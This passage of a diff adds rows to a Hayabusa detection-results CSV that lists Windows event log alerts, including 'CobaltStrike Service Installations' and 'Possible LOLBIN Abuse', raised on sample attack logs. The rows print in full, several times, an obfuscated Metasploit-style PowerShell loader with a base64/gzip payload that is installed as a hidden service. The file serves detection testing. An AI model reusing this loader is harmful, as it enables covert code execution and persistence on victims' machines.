c3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
